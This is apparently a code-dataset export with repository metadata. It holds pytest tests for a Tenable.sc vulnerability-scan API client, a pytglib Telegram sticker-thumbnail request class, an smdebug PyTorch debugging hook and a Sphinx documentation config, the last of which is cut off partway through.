assert resp == {'maxScanTime': 'unlimited'}
def test_scans_constructor_schedule_success(sc):
scan = sc.scans._constructor(schedule={'type': 'ical', 'start': ''})
assert {'schedule': {'type': 'ical', 'start': ''}} == scan
def test_scans_constructor_auto_mitigation_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(auto_mitigation='nope')
def test_scans_constructor_auto_mitigation_success(sc):
resp = sc.scans._constructor(auto_mitigation=True)
assert resp == {'classifyMitigatedAge': 'true'}
def test_scans_constructor_reports_typeerror_base(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports='nope')
def test_scans_constructor_reports_typeerror_id(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 'nope', 'reportSource': 'cumulative'}])
def test_scans_constructor_reports_typeerror_report_source(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 1}])
def test_scans_constructor_reports_unexpectedvalueerror_reportsource(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'something'}])
def test_scans_constructor_reports_success(sc):
resp = sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'cumulative'}])
assert resp == {'reports': [{'id': 1, 'reportSource': 'cumulative'}]}
def test_scans_constructor_asset_lists_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=1)
def test_scans_constructor_asset_list_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=['nope', ])
def test_scans_constructor_asset_lists_success(sc):
resp = sc.scans._constructor(asset_lists=[1, 2])
assert resp == {'assets': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_creds_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=1)
def test_scans_constructor_creds_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=['nope'])
def test_scans_constructor_creds_success(sc):
resp = sc.scans._constructor(creds=[1, 2])
assert resp == {'credentials': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_both_policy_and_plugin_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(plugin_id=1, policy_id=1)
def test_scans_constructor_plugin_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(plugin_id='nope')
def test_scans_constructor_plugin_id_success(sc):
resp = sc.scans._constructor(plugin_id=19506)
assert resp == {'type': 'plugin', 'pluginID': 19506}
def test_scans_constructor_policy_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(policy_id='nope')
def test_scans_constructor_policy_id_success(sc):
resp = sc.scans._constructor(policy_id=1)
assert resp == {'type': 'policy', 'policy': {'id': 1}}
@pytest.fixture
def scan(request, sc, vcr):
with vcr.use_cassette('sc_scans_create'):
scan = sc.scans.create('Example Scan', 1,
schedule_type='template',
targets=['127.0.0.1'],
policy_id=1000001)
def teardown():
try:
sc.scans.delete(int(scan['id']))
except APIError:
pass
request.addfinalizer(teardown)
return scan
@pytest.mark.vcr()
def test_scans_list(sc):
scans = sc.scans.list()
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'status', str)
@pytest.mark.vcr()
def test_scans_list_for_fields(sc):
scans = sc.scans.list(fields=['id', 'name'])
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
@pytest.mark.vcr()
def test_scans_details(sc, scan):
scan = sc.scans.details(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_details_for_fields(sc, scan):
scan_details = sc.scans.details(int(scan['id']), fields=['id', 'name', 'description'])
assert isinstance(scan_details, dict)
check(scan_details, 'id', str)
check(scan_details, 'name', str)
check(scan_details, 'description', str)
@pytest.mark.vcr()
def test_scans_create(scan):
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_create_plugin(sc):
scan = sc.scans.create('Example Scan 9', 9,
schedule_type='template',
targets=['127.0.0.1'],
plugin_id=1000001)
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_edit(sc, scan):
scan = sc.scans.edit(int(scan['id']), name='Edited Example Scan')
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_delete(scan, sc):
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_copy(scan, sc):
scan = sc.scans.copy(int(scan['id']), 'scan_copy', 1)
sc.scans.delete(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_launch(sc, scan):
launch = sc.scans.launch(int(scan['id']), diagnostic_target='target', diagnostic_password='password')
assert isinstance(launch, dict)
check(launch, 'scanID', str)
check(launch, 'scanResult', dict)
check(launch['scanResult'], 'initiatorID', str)
check(launch['scanResult'], 'ownerID', str)
check(launch['scanResult'], 'scanID', str)
check(launch['scanResult'], 'repositoryID', str)
check(launch['scanResult'], 'jobID', str)
check(launch['scanResult'], 'name', str)
check(launch['scanResult'], 'description', str, allow_none=True)
check(launch['scanResult'], 'details', str)
check(launch['scanResult'], 'status', str)
check(launch['scanResult'], 'downloadFormat', str)
check(launch['scanResult'], 'dataFormat', str)
check(launch['scanResult'], 'id', str)
| true
| true
|
1c445eaf4b2ea2fc8a00bd7b0b9e80eef01719f8
| 1,179
|
py
|
Python
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/pytglib
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 6
|
2019-10-30T08:57:27.000Z
|
2021-02-08T14:17:43.000Z
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 1
|
2021-08-19T05:44:10.000Z
|
2021-08-19T07:14:56.000Z
|
pytglib/api/functions/set_sticker_set_thumbnail.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 5
|
2019-12-04T05:30:39.000Z
|
2021-05-21T18:23:32.000Z
|
from ..utils import Object
class SetStickerSetThumbnail(Object):
"""
Sets a sticker set thumbnail; for bots only. Returns the sticker set
Attributes:
ID (:obj:`str`): ``SetStickerSetThumbnail``
Args:
user_id (:obj:`int`):
Sticker set owner
name (:obj:`str`):
Sticker set name
thumbnail (:class:`telegram.api.types.InputFile`):
            Thumbnail to set in PNG or TGS format. Animated thumbnails must be set for animated sticker sets and only for them. You can use a zero InputFileId to delete the thumbnail
Returns:
StickerSet
Raises:
:class:`telegram.Error`
"""
ID = "setStickerSetThumbnail"
def __init__(self, user_id, name, thumbnail, extra=None, **kwargs):
self.extra = extra
self.user_id = user_id # int
self.name = name # str
self.thumbnail = thumbnail # InputFile
@staticmethod
def read(q: dict, *args) -> "SetStickerSetThumbnail":
user_id = q.get('user_id')
name = q.get('name')
thumbnail = Object.read(q.get('thumbnail'))
return SetStickerSetThumbnail(user_id, name, thumbnail)
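# Illustrative usage (added sketch, not part of the original file): building
# this request object directly, based only on the __init__ shown above. The
# user id and set name are hypothetical placeholders; per the docstring, a
# zero InputFileId passed as the thumbnail deletes the current one.
#
#     req = SetStickerSetThumbnail(123456, "animals_by_mybot", thumbnail=None)
#     req.ID        # -> "setStickerSetThumbnail"
#     req.user_id   # -> 123456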
| 28.756098
| 177
| 0.625106
|
from ..utils import Object
class SetStickerSetThumbnail(Object):
ID = "setStickerSetThumbnail"
def __init__(self, user_id, name, thumbnail, extra=None, **kwargs):
self.extra = extra
self.user_id = user_id
self.name = name
self.thumbnail = thumbnail
@staticmethod
def read(q: dict, *args) -> "SetStickerSetThumbnail":
user_id = q.get('user_id')
name = q.get('name')
thumbnail = Object.read(q.get('thumbnail'))
return SetStickerSetThumbnail(user_id, name, thumbnail)
| true
| true
|
1c445eb15f606a0339ceffedf26e0ebbcac914b2
| 1,036
|
py
|
Python
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,610
|
2020-10-01T14:14:53.000Z
|
2022-03-31T18:02:31.000Z
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 1,959
|
2020-09-30T20:22:42.000Z
|
2022-03-31T23:58:37.000Z
|
sagemaker-debugger/model_specific_realtime_analysis/cnn_class_activation_maps/entry_point/custom_hook.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,052
|
2020-09-30T22:11:46.000Z
|
2022-03-31T23:02:51.000Z
|
import smdebug.pytorch as smd
import torch
from smdebug.core.modes import ModeKeys
class CustomHook(smd.Hook):
# register input image for backward pass, to get image gradients
def image_gradients(self, image):
image.register_hook(self.backward_hook("image"))
def forward_hook(self, module, inputs, outputs):
module_name = self.module_maps[module]
self._write_inputs(module_name, inputs)
# register outputs for backward pass. this is expensive, so we will only do it during EVAL mode
if self.mode == ModeKeys.EVAL:
outputs.register_hook(self.backward_hook(module_name + "_output"))
# record running mean and var of BatchNorm layers
if isinstance(module, torch.nn.BatchNorm2d):
self._write_outputs(module_name + ".running_mean", module.running_mean)
self._write_outputs(module_name + ".running_var", module.running_var)
self._write_outputs(module_name, outputs)
self.last_saved_step = self.step
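# Illustrative wiring (added sketch, not part of the original file): a hedged
# example of how a hook like this is typically attached in a training script.
# The out_dir path and save interval are placeholders; register_module() is
# smdebug's standard way to install forward/backward hooks on a
# torch.nn.Module, and image_gradients() should be called on the input batch
# before the forward pass so the image gradients are captured.
#
#     model = MyModel()  # any torch.nn.Module (hypothetical)
#     hook = CustomHook(out_dir="/tmp/smdebug_out",
#                       save_config=smd.SaveConfig(save_interval=100))
#     hook.register_module(model)
#     ...
#     hook.image_gradients(images)   # in the eval loop, before model(images)
#     outputs = model(images)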
| 38.37037
| 103
| 0.696911
|
import smdebug.pytorch as smd
import torch
from smdebug.core.modes import ModeKeys
class CustomHook(smd.Hook):
def image_gradients(self, image):
image.register_hook(self.backward_hook("image"))
def forward_hook(self, module, inputs, outputs):
module_name = self.module_maps[module]
self._write_inputs(module_name, inputs)
if self.mode == ModeKeys.EVAL:
outputs.register_hook(self.backward_hook(module_name + "_output"))
if isinstance(module, torch.nn.BatchNorm2d):
self._write_outputs(module_name + ".running_mean", module.running_mean)
self._write_outputs(module_name + ".running_var", module.running_var)
self._write_outputs(module_name, outputs)
self.last_saved_step = self.step
| true
| true
|
1c445f46b78f84e0666b4e389bddb6811327d7dd
| 14,259
|
py
|
Python
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 213
|
2017-09-25T05:49:50.000Z
|
2022-03-01T15:26:26.000Z
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 4
|
2019-05-06T09:15:34.000Z
|
2021-10-15T07:47:40.000Z
|
doc/conf.py
|
sunilkrdeep/LearningApacheSpark
|
2aed1d06630eb17a5b6515658f15e29955a208bd
|
[
"MIT"
] | 92
|
2019-03-03T23:17:24.000Z
|
2022-03-23T22:25:14.000Z
|
# -*- coding: utf-8 -*-
#############################################################################
# I heavily borrowed from, modified, and used the configuration in conf.py of
# the Theano project. I will keep all the comments from the Theano team, and
# the copyright of this file belongs to the Theano team.
# reference:
#
# Theano repository: https://github.com/Theano/Theano
# conf.py: https://github.com/Theano/Theano/blob/master/doc/conf.py
##############################################################################
# theano documentation build configuration file, created by
# sphinx-quickstart on Tue Oct 7 16:34:06 2008.
#
# This file is execfile()d with the current directory set to its containing
# directory.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
from __future__ import absolute_import, print_function, division
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import versioneer
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.doctest',
'sphinx.ext.napoleon',
'sphinx.ext.linkcode',
'sphinx.ext.intersphinx'
]
todo_include_todos = True
napoleon_google_docstring = False
napoleon_include_special_with_doc = False
# We do it like this to support multiple Sphinx versions without emitting
# warnings. Our buildbot considers warnings as errors.
try:
from sphinx.ext import imgmath
extensions.append('sphinx.ext.imgmath')
except ImportError:
try:
from sphinx.ext import pngmath
extensions.append('sphinx.ext.pngmath')
except ImportError:
pass
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Learning Apache Spark with Python'
copyright = '2017, Wenqiang Feng'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# We need this hokey-pokey because versioneer needs the current
# directory to be the root of the project to work.
# The short X.Y version.
# version = '1.00'
# The full version, including alpha/beta/rc tags.
# release = '1.00'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
exclude_dirs = ['images', 'scripts', 'sandbox']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# Enable link of 'View page source'
html_show_sourcelink = False
# Add 'Edit on Github' link instead of 'View page source'
# reference:https://docs.readthedocs.io/en/latest/vcs.html
# html_context = {
# # Enable the "Edit in GitHub link within the header of each page.
# 'display_github': True,
# # Set the following variables to generate the resulting github URL for each page.
# # Format Template: https://{{ github_host|default("github.com") }}/{{ github_user }}
# #/{{ github_repo }}/blob/{{ github_version }}{{ conf_py_path }}{{ pagename }}{{ suffix }}
# #https://github.com/runawayhorse001/SphinxGithub/blob/master/doc/index.rst
# 'github_user': 'runawayhorse001',
# 'github_repo': 'SphinxGithub',
# 'github_version': 'master/doc/' ,
# }
# {% if display_github %}
# <li><a href="https://github.com/{{ github_user }}/{{ github_repo }}
# /tree/{{ github_version }}{{ conf_py_path }}{{ pagename }}.rst">
# Show on GitHub</a></li>
# {% endif %}
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'default.css'
# html_theme = 'sphinxdoc'
# Read the docs style:
if os.environ.get('READTHEDOCS') != 'True':
try:
import sphinx_rtd_theme
except ImportError:
pass # assume we have sphinx >= 1.3
else:
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme = 'sphinx_rtd_theme'
def setup(app):
app.add_stylesheet("fix_rtd.css")
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = 'images/theano_logo_allwhite_210x70.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'images/icon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'spnixgitdoc'
# Options for the linkcode extension
# ----------------------------------
# Resolve function
# This function is used to populate the (source) links in the API
def linkcode_resolve(domain, info):
def find_source():
# try to find the file and line number, based on code from numpy:
# https://github.com/numpy/numpy/blob/master/doc/source/conf.py#L286
obj = sys.modules[info['module']]
for part in info['fullname'].split('.'):
obj = getattr(obj, part)
import inspect
import os
fn = inspect.getsourcefile(obj)
fn = os.path.relpath(fn, start=os.path.abspath('..'))
source, lineno = inspect.getsourcelines(obj)
return fn, lineno, lineno + len(source) - 1
if domain != 'py' or not info['module']:
return None
try:
filename = '%s#L%d-L%d' % find_source()
except Exception:
filename = info['module'].replace('.', '/') + '.py'
#https://github.com/runawayhorse001/LearningApacheSpark/blob/master/pyspark/ml/clustering.py
return "https://github.com/runawayhorse001/LearningApacheSpark/blob/master/%s" % (filename)
# Options for LaTeX output
# ------------------------
latex_elements = {
# The paper size ('letter' or 'a4').
#latex_paper_size = 'a4',
# The font size ('10pt', '11pt' or '12pt').
'pointsize': '11pt',
# Additional stuff for the LaTeX preamble.
#latex_preamble = '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'pyspark.tex', 'Learning Apache Spark with Python',
'Wenqiang Feng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = 'images/logo.jpg'
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = 'images/snake_theta2-trans.png'
#latex_logo = 'images/theano_logo_allblue_200x46.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
#latex_elements['preamble'] = '\usepackage{xcolor}'
# Additional stuff for the LaTeX preamble.
#latex_preamble
latex_elements['preamble'] = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\bU{\\mathbf{U}}\n'+\
'\\def\\bV{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
#pngmath_divpng_args = ['-gamma', '1.5', '-D', '110', '-bg', 'Transparent']
imgmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{mathtools}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\usepackage{dsfont}\n'+\
'\\def\\Z{\\mathbb{Z}}\n'+\
'\\def\\R{\\mathbb{R}}\n'+\
'\\def\\bX{\\mathbf{X}}\n'+\
'\\def\\X{\\mathbf{X}}\n'+\
'\\def\\By{\\mathbf{y}}\n'+\
'\\def\\Bbeta{{\\boldsymbol{\\beta}}}\n'+\
'\\def\\U{\\mathbf{U}}\n'+\
'\\def\\V{\\mathbf{V}}\n'+\
'\\def\\V1{\\mathds{1}}\n'+\
'\\def\\hU{\\mathbf{\hat{U}}}\n'+\
'\\def\\hS{\\mathbf{\hat{\Sigma}}}\n'+\
'\\def\\hV{\\mathbf{\hat{V}}}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\boldsymbol{x}}\n'+\
'\\def\\y{\\boldsymbol{y}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
| 37.822281
| 96
| 0.580125
|
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'spnixgitdoc'
# Options for the linkcode extension
# ----------------------------------
# Resolve function
# This function is used to populate the (source) links in the API
def linkcode_resolve(domain, info):
def find_source():
# try to find the file and line number, based on code from numpy:
# https://github.com/numpy/numpy/blob/master/doc/source/conf.py#L286
obj = sys.modules[info['module']]
